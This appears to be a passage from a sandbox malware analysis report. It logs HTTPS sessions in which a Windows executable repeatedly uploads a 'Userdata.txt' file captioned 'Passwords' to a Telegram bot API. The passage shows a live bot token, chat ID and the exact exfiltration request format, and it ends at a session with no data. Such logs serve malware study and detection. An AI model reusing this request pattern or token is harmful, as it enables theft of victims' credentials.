                                                                                                                    13192.168.2.449933149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:24 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd32a26a7e53b1
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:24 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 32 36 61 37 65 35 33 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd32a26a7e53b1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:24 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:24 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:24 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43772,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576664,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.449945149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:25 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd32b6c93ca24d
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 36 63 39 33 63 61 32 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd32b6c93ca24dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:26 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:26 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:26 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43773,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576666,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.449957149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:27 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd32c9bf1af266
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    2025-01-11 06:24:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 39 62 66 31 61 66 32 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd32c9bf1af266Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:27 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:27 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:27 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43774,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576667,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.449969149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:28 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd32db4edd8fcd
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 62 34 65 64 64 38 66 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd32db4edd8fcdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:29 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:29 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:29 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43775,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576669,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.449981149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:30 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd32ef841d8f04
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:30 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 66 38 34 31 64 38 66 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd32ef841d8f04Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:30 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:30 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:30 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43776,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576670,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.449993149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:32 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33025319aa33
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 32 35 33 31 39 61 61 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33025319aa33Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:32 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:32 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 542
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:32 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43777,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576672,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.450005149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-11 06:24:33 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary================8dd33166bdcba3f
                                                                                                                    Host: api.telegram.org
                                                                                                                    Content-Length: 1090
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-11 06:24:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 36 36 62 64 63 62 61 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: --===============8dd33166bdcba3fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                    2025-01-11 06:24:34 UTC388INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.18.0
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:33 GMT
                                                                                                                    Content-Type: application/json
                                                                                                                    Content-Length: 543
                                                                                                                    Connection: close
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                    2025-01-11 06:24:34 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":43778,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576673,"document":{"file_n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.450017149.154.167.2204437776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
